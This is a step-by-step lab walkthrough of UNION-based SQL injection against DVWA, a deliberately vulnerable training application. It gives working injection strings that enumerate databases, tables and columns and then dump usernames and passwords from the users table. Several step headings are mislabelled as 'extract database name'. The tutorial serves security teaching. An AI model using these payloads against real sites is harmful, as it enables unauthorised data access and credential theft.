- Goto SQL Injection's landing page.
- Click on view-source, to check-out the source-code for the page.
- Type random input to check type of output recieved after submitting.
- Basic check to verify whether a server is vulnerable to SQL injection is : single inverted comma.
- A server, vulnerable to SQL inejection would throw the following error if you enter ' as input in text-box:
- You should know basic SQL commands/operations such as SELECT, UNION, ORDER BY, GROUP BY etc. You can read about them - here
- Anything after '#' is considered as a comment in SQL language.
- A schema is a database, so the SCHEMATA table provides information about databases.
Column name | Description |
---|---|
CATALOG_NAME | The name of the catalog to which the schema belongs. This value is always def. |
SCHEMA_NAME | The name of the schema. |
DEFAULT_CHARACTER_SET_NAME | The schema default character set. |
DEFAULT_COLLATION_NAME | The schema default collation. |
SQL_PATH | This value is always NULL. |
DEFAULT_ENCRYPTION | The schema default encryption. |
- Syntax:
SELECT SCHEMA_NAME AS `Database`
FROM INFORMATION_SCHEMA.SCHEMATA
[WHERE SCHEMA_NAME LIKE 'wild']
SHOW DATABASES
[LIKE 'wild']
- We want to find out name of database and name of users attached to that database.
- Functions to use :
database()
anduser()
- Type the following command to print database used:
2'UNION SELECT database(), user() #
- Type the following SQL Injection command to extract database name:
2' UNION SELECT schema_name, 2 FROM information_schema.schemata #'
- Type the following SQL Injection command to extract database name:
2' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema = 'dvwa' #'
- Type the following SQL Injection command to extract database name:
2' UNION SELECT column_name, column_type FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name = 'users' #'
- Type the following SQL Injection command to extract database name:
2' UNION SELECT CONCAT(user_id, '-', first_name,' ', last_name), CONCAT(user, ':', password) FROM dvwa.users #'